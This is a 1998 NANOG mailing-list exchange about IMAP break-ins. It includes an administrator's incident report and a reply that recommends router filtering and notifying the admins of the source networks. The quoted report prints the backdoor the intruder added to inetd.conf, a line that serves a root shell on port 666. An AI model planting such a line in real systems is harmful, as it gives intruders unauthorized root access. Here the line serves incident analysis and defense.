IMAP attacks continue
Alex P. Rudnev
alex at Relcom.EU.net
Tue Nov 24 11:31:06 UTC 1998
Btw. The best you can do is to install access-filter on the router and
log any attempts to connect into this port in your network; and if you
see such attempt you should write 'Hacker in your system (suspection)'
warning to the network admin where this connect was originated from.
70% of this cases should be 'broken systems'.
On Mon, 23 Nov 1998, Phil Howard wrote:
> Date: Mon, 23 Nov 1998 09:35:17 -0600 (CST)
> From: Phil Howard <phil at whistler.intur.net>
> To: nanog at merit.edu
> Subject: Re: IMAP attacks continue
>
> An addendum to:
>
> > I found a machine that had Red Hat 5.1 unmodified running on it, and it
> > got hit. So I closed things off and looked around for damage and found
> > the following:
> >
> > 1. Syslogd had been killed off and the syslog file deleted.
> >
> > 2. A backdoor was installed in /etc/inetd.conf as follows:
> >
> > ttalk stream tcp nowait root /bin/sh sh -i
>
> I checked the ports assignments from IANA and there is no such thing as
> "ttalk". I found this line in /etc/services:
>
> ttalk 666/tcp
>
> so it appears to be hijacking the port used by (as seen in the file
> ftp://ftp.iana.org/in-notes/iana/assignments/port-numbers):
>
> mdqs 666/tcp
> mdqs 666/udp
> doom 666/tcp doom Id Software
> doom 666/udp doom Id Software
>
> So also check /etc/services on any potentially compromised machines.
>
> --
> -- *-----------------------------* Phil Howard KA9WGN * --
> -- | Inturnet, Inc. | Director of Internet Services | --
> -- | Business Internet Solutions | eng at intur.net | --
> -- *-----------------------------* philh at intur.net * --
>
Aleksei Roudnev, Network Operations Center, Relcom, Moscow
(+7 095) 194-19-95 (Network Operations Center Hot Line),(+7 095) 239-10-10, N 13729 (pager)
(+7 095) 196-72-12 (Support), (+7 095) 194-33-28 (Fax)
More information about the NANOG
mailing list